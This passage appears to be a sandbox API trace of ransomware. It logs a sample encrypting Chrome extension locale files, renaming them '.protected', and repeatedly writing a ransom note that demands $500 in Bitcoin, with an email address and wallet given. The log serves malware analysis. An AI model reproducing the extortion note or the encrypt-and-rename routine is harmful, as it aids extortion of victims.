halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.727] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.727] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.727] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.727] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.727] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.727] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.727] CloseHandle (hObject=0x164) returned 1 [0078.728] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.728] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned 141 [0078.728] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0078.728] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*") returned 143 [0078.728] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.728] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\.") returned 143 [0078.728] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.728] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.728] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\..") returned 144 [0078.728] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.728] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.728] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.728] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.728] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.728] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.728] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.728] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.729] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.729] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.729] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned 155 [0078.729] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.729] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.730] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.730] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.730] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.730] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.730] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.730] CloseHandle (hObject=0x168) returned 1 [0078.730] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.protected") returned 165 [0078.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json.protected")) returned 1 [0078.730] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.730] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.731] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0078.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.731] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.731] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.732] lstrlenA (lpString="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") returned 684 [0078.732] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.732] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.732] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.732] CloseHandle (hObject=0x164) returned 1 [0078.732] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.732] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0078.732] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0078.732] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0078.732] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0078.732] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0078.732] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it") returned 141 [0078.732] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0078.732] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0078.732] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*") returned 143 [0078.732] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.733] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.733] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.733] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.733] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.733] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.733] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\.") returned 143 [0078.733] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.733] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.733] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.733] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.733] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.733] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.733] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\..") returned 144 [0078.733] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.733] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.733] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.733] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.734] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.734] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") 
returned 155 [0078.734] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.734] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.734] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.734] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json") returned 155 [0078.734] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.734] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.735] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.735] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.735] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.736] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.736] CloseHandle (hObject=0x168) returned 1 [0078.736] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.protected") returned 165 [0078.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\messages.json.protected")) returned 1 [0078.736] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.736] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.736] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\RESTORE_FILES.txt") returned 159 [0078.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.737] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.737] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.737] lstrlenA (lpString="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") returned 684 [0078.737] WriteFile (in: 